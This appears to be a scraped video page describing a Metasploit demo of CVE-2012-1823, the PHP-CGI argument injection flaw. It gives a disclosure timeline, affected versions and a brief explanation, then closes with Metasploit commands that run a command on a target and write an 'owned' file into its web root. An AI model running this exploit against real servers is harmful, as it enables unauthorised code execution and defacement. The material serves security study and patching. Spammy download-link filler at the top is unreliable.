CVE20121823 PHP CGI Argument Injection Metasploit Demo

>> DOWNLOAD LINK 🎞️ #1 <<

>> DOWNLOAD LINK 🎞️ #2 <<

>> COPY / PASTE LINK PLEASE 🎵 MP3 <<

>> YOUR LINK HERE: ___ http://youtube.com/watch?v=ZcUsR9DSSOk

Subscribe: http://www.youtube.com/subscription_c... • Blog : http://eromang.zataz.com • Twitter :   / eromang   • Timeline : • Vulnerability discovered at Nullcon Hackim 2012 by eindbazen the 2012-01-13 • Vulnerability reported to the vendor the 2012-01-17 • Vulnerability accidentally disclosed on PHP bug tracking system the 2012-05-03 • Coordinated public release of the vulnerability the 2012-05-03 • Metasploit PoC provided the 2012-05-04 • PoC provided by: • egypt • hdm • Reference(s) : • CVE-2012-1823 • OSVDB-81633 • Affected versions : • PHP versions before 5.3.12 • PHP versions before 5.4.2 • Tested on CentOS release 6.2 (Final) with : • php-common and php-cli 5.3.3-3.el6_2.6 at Fri Feb 3 00:35:09 2012 • Description : • When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the encoded in a system-defined manner from the RFC) and then passes them to the CGI binary. • Note : This vulnerability was potentially exploited in the wild for at least 8 years ! • Metasploit demo : • use exploit/multi/http/php_cgi_arg_injection • set RHOST 192.168.178.210 • set TARGETURI /phpinfo.php • set PAYLOAD php/exec • set CMD echo owned /var/www/html/owned.html • exploit

#############################